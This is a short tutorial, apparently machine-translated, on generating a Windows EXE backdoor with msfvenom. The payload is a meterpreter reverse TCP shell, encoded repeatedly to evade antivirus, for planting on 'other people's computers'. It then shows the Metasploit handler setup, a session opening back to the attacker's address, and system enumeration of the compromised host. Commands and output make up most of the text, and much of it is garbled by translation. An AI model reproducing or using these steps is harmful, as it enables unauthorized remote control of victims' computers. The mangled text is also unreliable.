Generate EXE backdoor through Metasploit, take shell

1. The first generation of our little cutie, later to avoid the killing after the implantation of other people's computers.

[Email protected] ~]#msfvenom-p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai-i 5 lhost=192.168.1.25 lport=6666-f exe >./ Lyshark.exeNo Platform was selected, choosing Msf::module::P latform::windows from the Payloadno Arch selected, selecting Arch:x86 from the Payloadfound1compatible encodersattempting to encode payload with5Iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size368(iteration=0) X86/shikata_ga_nai succeeded with size395(iteration=1) X86/shikata_ga_nai succeeded with size422(iteration=2) X86/shikata_ga_nai succeeded with size449(iteration=3) X86/shikata_ga_nai succeeded with size476(iteration=4) X86/shikata_ga_nai chosen with final size476Payload Size:476bytesfinal size of EXEfile:73802Bytes[[email protected]~]# [[email protected]~]#lsLyshark.exe

2. Go to Metasploit and do the following:

[[Email protected] ~  ]# msfconsole  This copy of Metasploit-framework is Morethan weeks old. Consider running'msfupdate'To update to the latest version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %  %%%%%% Percent%%%%%%%%%%% https://metasploit.com%%%%%%%%%%%%%%%%%%%%%%%%%% percent%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%      %%%%%%%%%%%%%%%%%%%%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%%%%%  %%  %%  %      %%  %%    %%%%%      %    %%%%  %%   %%%%%%       %%%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%   %%%%%%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%%%%%%%%%%%%% %%%%     %%%%%    %%  %%     %    %%  %%%%  %%%%   %%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%=[Metasploit v4.16.55-dev-                        ]+ -- --=[1757Exploits-1004Auxiliary-306post]+ -- --=[536Payloads- AEncoders-TenNops]+----=[free Metasploit Pro trial:http://R-7.co/trymsp]MSF>

MSF > Use exploit/multi/  HandlerMSF exploit (multi

MSF exploit (Multi/handler) > Set Payload windows/meterpreter/ reverse_tcp= windows/meterpreter/reverse_tcp

MSF exploit (multi/handler) > Show OptionsModule options (Exploit/multi/handler): Name current Setting Required Description----  ---------------  --------  -----------Payload Options (Windows/meterpreter/reverse_tcp): Name current Setting Required Description----      ---------------  --------  -----------Exitfunc Process Yes Exit technique (Accepted:"', SEH, thread, process, none) Lhost Yes the listen address Lport4444Yes the listen portexploit target:id Name--  ----0Wildcard Target

MSF exploit (Multi/handler) > Set lhost 192.168.1.25192.168. 1.25 MSF exploit (multi/handler) > set lport 6666  6666

3. Use our little cutie (Lyshark.exe) in a variety of ways to run on the target host, and then see the shell rebound

MSF exploit (multi/handler) >  exploit [*] Started reverse TCP handler on192.168.1.25:6666 [*] Sending stage (179779bytes) to192.168.1.10[*] Meterpreter session1Opened (192.168.1.25:6666-192.168.1.10:54264) at2018- .- Geneva  Geneva: -: --0400Meterpreter>

4. Now that the host has fallen, check the system.

Meterpreter >  sysinfocomputer        : DESKTOP-cacduanos              14393). Architecture    : X64system language:zh_cndomain          2Meterpreter     : x86/

Note: This method must be run on the target host, not the brain!

Generate EXE backdoor through Metasploit, take shell